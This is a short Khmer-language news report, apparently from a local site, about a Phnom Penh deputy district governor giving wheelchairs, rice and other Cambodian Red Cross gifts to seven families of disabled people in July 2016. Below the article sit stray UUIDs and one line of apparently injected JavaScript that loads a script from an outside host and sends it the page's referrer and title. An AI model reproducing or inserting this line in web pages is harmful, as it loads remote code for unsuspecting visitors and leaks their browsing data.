លោក ឌី រត្ន័ខេមរុណបាននាំយករទេះពិការទៅចែកជូនប្រជាពលរដ្ឋពិការ និង ស្វិតដៃជេីង កាលពីព្រឹកម៉ិញនេះ

ភ្នុំពេញ៖ នៅព្រឹកម៉ោង ៩ ថ្ងៃទី ២៦ ខែកក្កដា ឆ្នាំ២០១៦ លោក ឌី រត្ន័ខេមរុណ អភិបាលរងខណ្ឌមានជ័យ និង ជាប្រធានអនុសាខាកាកកបាទក្រហមខណ្ឌមានជ័យ បាននាំយករទេះពិការទៅចែកជូនប្រជាពលរដ្ឋពិការ និង ស្វិតដៃជេីង មិនអាចដេីរបាន រួមទាំងអំណោយមនុស្សធម៍របស់សម្តេចកិត្តិព្រឹទ្ធបណ្ឌិតប៊ុន រ៉ានី ហ៊ុន សែនប្រធានកាកកបាទក្រហមកម្ពុជា ចំនួន៧គ្រួសារ ក្នុងសង្កាត់បឹងទំពន់ចំនួន២គ្រួសារ និង សង្កាត់ចាក់អង្រែក្រោមចំនួន ៥គ្រួសារ ។

មានប្រសាសន៍នាឱកាសនោះ លោកប្រធានគណៈកម្មាធិការអនុសាខា បានលើកឡើងពីការយកចិត្តទុកដាក់គិតគូរខ្ពស់ដល់សុខទុក្ខប្រជាពលរដ្ឋយើងនៅតាមមូលដ្ឋានពីសំណាក់ សម្តេចកិត្តិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុន សែន ប្រធានកាកបាទក្រហមកម្ពុជា តែងតែផ្តល់នូវអនុសាសន៍ក្រេីនរំលឹកដល់គ្រប់សាខា អនុសាខាទាំងអស់ត្រូវយកចិត្តទុកដាក់អោយបានម៉តចត់ចំពោះសុខទុក្ខប្រជាពលរដ្ឋដែលនូវក្នុងមូលដ្ឋានរបស់ខ្លួនជាពិសេសប្រជាពលរដ្ឋដែលជួបការលំបាកដោយប្រការផ្សេងៗ ដោយមិនប្រកាន់ពីនិន្នាការនយោបាយ ជាតិសាសន៍ សាសនា វណ្ណៈ ពណ៌ សម្បុរអ្វីទាំងអស់ ពោល (ទីណាមានការលំបាក ទីនោះមានកាកបាទក្រហមកម្ពុជា) ។
អំណោយមនុស្សធម៏របស់សម្តេចកិត្តិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុនសែន ដែលត្រូវចែកជូនរួមមាន រទេះពិការ ១ , អង្ករចំនួន ១បាវ ស្មេី៣០គីឡូ  សារុង១  មុង១ ភួយ ១ ក្រម៉ា១ ទឹកក្រូច ១យួរ ទឹកត្រី១យួរ ទឹកសុីអុីវ១យួរ  ត្រីខ ១យួរ មីយេីង១កេះ រួមទាំងថវិកាក្នុងចំនួន៣០០០០រៀលផងដែល ។

4d3417ec-0671-476f-8a3a-8705e380ff2b 6d5c664f-336a-4bbd-92ae-23ca130575d3 374b4ee5-ef3b-4b3f-bbf7-261306ee5651 adb07d2b-9c46-4e9f-bc5d-6d6073ec2a14 d17d8031-adef-4a7e-8037-481f27b1c670 dd76a6b7-7863-41e9-8149-d483b5bc9e9f ee436f64-0dac-4baf-8168-8b3cca2bdf56

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More